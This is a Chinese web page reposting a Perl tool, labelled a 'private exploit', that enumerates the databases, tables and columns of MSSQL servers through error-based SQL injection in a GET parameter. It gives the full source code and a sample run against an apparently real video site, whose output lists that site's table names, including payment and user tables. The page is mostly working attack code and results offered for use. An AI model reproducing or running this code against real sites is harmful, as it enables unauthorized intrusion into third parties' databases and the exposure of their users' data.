|
MSSQL Database Scanner for SQL |
|
|
|
|
|
一个通过SQL Injection手段扫描MSSQL数据库的库名,表名,字段名的小程序。
思想来源于《MSSQL 跨“COOL”查询,你想怎么玩?》by 臭要饭的.黑夜
可能不是很通用,有时需要自已进行一些小的修改。
工作流程是这样的,先扫描得到所有的库名和库中的表名(使用-t table_scan),然后再根据扫描得到的表名及对应的表ID来扫描某个表中的所有的字段(使用-t
column_scan)。
D:\temp>scan_sql.pl -h www.vod999.com -w "/movie_detail.asp?movie_m1id=1264" -t
table_scan
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask<envymask@ph4nt0m.net>
Private Codz!Don’t distributed it!
===================================================
Usage: D:\temp\scan_sql.pl -h <Host> [-p <port>] -w <normal URL> -t <scan type>
[-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected
"column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from
table_scan,only selected "column_scan" can use this option
Eg: D:\temp\scan_sql.pl -h www.target.com -p 80 -w
"/movie_detail.asp?movie_m1id=1264" -t table_scan
D:\temp\scan_sql.pl -h www.target.com -p 80 -w
"/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
..
Database name scan complete!
===================================
webmusic
webshop
===================================
..................................................................................................................................................................................................
Database "webmusic" scan complete!
..............
Database "webshop" scan complete!
============== webmusic ==============
| boardcast(117575457) | 9TianOnline(1181247263) | ad(1707153127) |
agreeuser(19701060
59) | answer_find_other(1326627769) | answer_findsinglesong(1310627712) |
article(523148909)
| auth_record(1415676091) | BaoYueOperation(1709249144) | block_ip(1863677687) |
ch
arts(759673754) | CodeCollate(1088722931) | CongziOperation(1309247719) |
consume_record(191
5153868) | degree(1621580815) | djstation(1154103152) | dtproperties(149575571)
| er
ror_geci(331148225) | find_other(1342627826) | findsinglesong(1454628225) |
geci(10281
98713) | GetDropBY(1981250113) | guestbook(996198599) | jiaoxue(2020202247) |
jxtype(135671531)
| license_song(1844201620) | lmarticle(2037582297) | lmtree(2021582240) |
maga(1198627313)
| midi(1684201050) | midi_old(1579152671) | midi_subsection(1463676262) |
mobile_affirm(1540
200537) | mobile_code(1252199511) | mobile_comfirm(1351675863) |
mobile_operation(179967745
9) | mobile_pic(1767677345) | mobile_receive(1620200822) |
mobiletype(1643152899)
| movie(576721107) | movie_record(1613248802) | movie_user(1568724641) |
movie1(768
721791) | mtv(427148567) | musicuser(1717581157) | my(125243501) |
mystation(2002106173) | nn
ews(868198143) | nnews_history(1531152500) | no_singlesong(1358627883) |
onlineuser(1099150
961) | p2puser(717245610) | pay_card(151671588) | pay_money(2075154438) |
pay_record_9sky(19
52726009) | pay_record_9tian(845246066) | pay_record_cg2dv(653245382) |
pay_record_likex(6
05245211) | pay_record_moviethat(2000726180) | pay_record_vod999(2032726294) |
pbcatcol(1
81575685) | pbcatedt(197575742) | pbcatfmt(213575799) | pbcattbl(229575856) |
pbcatvld(2
45575913) | phb(750625717) | picture(603149194) | RECORDIN(130099504) |
Results(15
15152443) | ring(1191675293) | rqzs(277576027) | sarticle(2069582411) |
self(13141
03722) | send_record(1652200936) | send_song(2068202418) | singer(201767776) |
singlesong
(340196262) | singlesong_shonline(1856725667) | singlesong_zhengzhou(1220199397)
| sm
s(231671873) | sms_img(839674039) | sms_text(727673640) |
sms_text_type(1796201449) | sm
s_user(1840725610) | song(148195578) | study(1246627484) | studytype(1262627541)
| st
yle(1547152557) | syrg(1390627997) | tempuser(322100188) | tempvip(1348199853) |
txt(198958
2126) | unite_baoyue(941246408) | user_activity(2096726522) | users(1973582069)
| vi
puser(1456724242) | vox_xs(1303675692) | ydd(1374627940)
============== webshop ==============
| brand(357576312) | class(645577338) | dtproperties(1977058079) |
guestbook(83757802
2) | order(741577680) | product(709577566) | user(597577167)
D:\temp>
#We found the table id of webmusic.dbo.movie is 576721107
D:\temp>scan_sql.pl -h www.vod999.com -w "/movie_detail.asp?movie_m1id=1264" -t
column_scan -d webmusic -i 576721107
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask<envymask@ph4nt0m.net>
Private Codz!Don’t distributed it!
===================================================
Usage: D:\temp\scan_sql.pl -h <Host> [-p <port>] -w <normal URL> -t <scan type>
[-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected
"column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from
table_scan,only selected "column_scan" can use this option
Eg: D:\temp\scan_sql.pl -h www.target.com -p 80 -w
"/movie_detail.asp?movie_m1id=1264" -t table_scan
D:\temp\scan_sql.pl -h www.target.com -p 80 -w
"/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
...........................
============== webmusic.dbo.576721107 ==============
| movie_actor | movie_area | movie_authnum | movie_ddj | movie_direct | movie_dj
| mo
vie_djnum | movie_dntype | movie_filename | movie_filesize | movie_filetype
| movie_free | movie_id | movie_img | movie_intro | movie_m1id | movie_mdj | mo
vie_name | movie_num | movie_path | movie_price | movie_seed | movie_smovie | mo
vie_soundtrack | movie_time | movie_type | movie_updatetime
D:\temp>
PHP代码:
#!/usr/bin/perl
#Private Exploit!Don’t distributed it!
$|=1;
use Socket;
use Getopt::Std;
getopt(’hpwtdi’);
$host=$opt_h || "www.vod999.com";
$port=$opt_p || 80;
$path=$opt_w || "/movie_detail.asp?movie_m1id=1264";
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
usage();
if($type eq "table_scan")
{
scan_db();
print "\nDatabase name scan
complete!\n===================================\n";
foreach (@sqldb)
{
print "$_\n";
}
print "===================================\n";
scan_table(@sqldb);
for($i=0;$i<@sqldb;$i++)
{
print "\n\n============== $sqldb[$i] ==============\n\n";
@tb=split(/n/,$table_name[$i]);
@tbid=split(/n/,$table_id[$i]);
for($j=0;$j<@tb;$j++)
{
print "| $tb[$j]($tbid[$j])\t";
}
}
}
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne ""))
{
scan_columns($database,$tab_id);
print "\n============== $database.dbo.$tab_id ==============\n\n";
foreach (@columns)
{
print "| $_\t";
}
}
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(’tcp’)||0) || die("Socket
problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can’t connect...\n");
}
}
sub scan_db()
{
my $i=7;
my $req,$get;
my $db=1;
my @res;
while($db ne "not found")
{
$get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i)";
$req= make_request($get);
@res=sendraw($req);
$db=findstr(@res);
if($db ne "not found")
{
@sqldb=(@sqldb,$db);
}
$i++;
}
}
sub findstr
{
my @tmpres=@_;
my $tmpline;
my $s1,$s2,$s3;
foreach $tmpline (@tmpres)
{
if($tmpline=~/char 值.*转换/isg)
{
$s1=0;
$s2=0;
$s3=0;
($s1,$s2,$s3)=split(/’/,$tmpline);
$s2=~s/ //isg;
print ".";
if(length($s2) > 1)
{
return $s2;
}
}
}
return "not found";
}
sub scan_table
{
my @db=@_;
my $req,$get;
my $table=1;
my @res;
my $tmpstr1;
my $i=0;
my $tableid;
foreach $db_name (@db)
{
$tmpstr1="";
$table=1;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype=’U’)";
$req= make_request($get);
@res=sendraw($req);
$table=findstr(@res);
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype=’U’%20and%20name=’$table’%20and%20uid>(str(id)))";
$req= make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
$tmpstr1="’$table’";
while($table ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype=’U’%20and%20name%20not%20in($tmpstr1))";
$req= make_request($get);
@res=sendraw($req);
$table=findstr(@res);
if($table ne "not found")
{
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype=’U’%20and%20name=’$table’%20and%20uid>(str(id)))";
$req= make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
}
$tmpstr1=$tmpstr1.",’$table’";
}
print "\nDatabase \"$db_name\" scan complete!\n";
$i++;
}
}
sub scan_columns
{
my $this_db_name=shift;
my $this_table_id=shift;
my $get,$req,$tmpstr;
my @res;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id)";
$req= make_request($get);
@res=sendraw($req);
$column=findstr(@res);
@columns=(@columns,$column);
$tmpstr="’$column’";
while($column ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($tmpstr))";
$req= make_request($get);
@res=sendraw($req);
$column=findstr(@res);
if($column ne "not found")
{
@columns=(@columns,$column);
$tmpstr=$tmpstr.",’$column’";
}
}
}
sub make_request
{
my $getstr=shift;
my $reqstr;
$reqstr= "GET $getstr HTTP/1.0\r\n".
"HOST:$host\r\n\r\n";
return $reqstr;
}
sub usage
{
print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask<envymask@ph4nt0m.net>
===================================================
Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database
name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected
"column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id
from table_scan,only selected "column_scan" can use this option
Eg: $0 -h www.target.com -p
80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
$0 -h www.target.com -p
80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
} 
在百度中查找更多MSSQL Database Scanner for SQL 的内容
|
|
|
|
|
|
“ MSSQL Database Scanner for SQL ”来源于网络,版权归作者所有!勿用于商业用途。 |
|
| |
本类阅读TOP10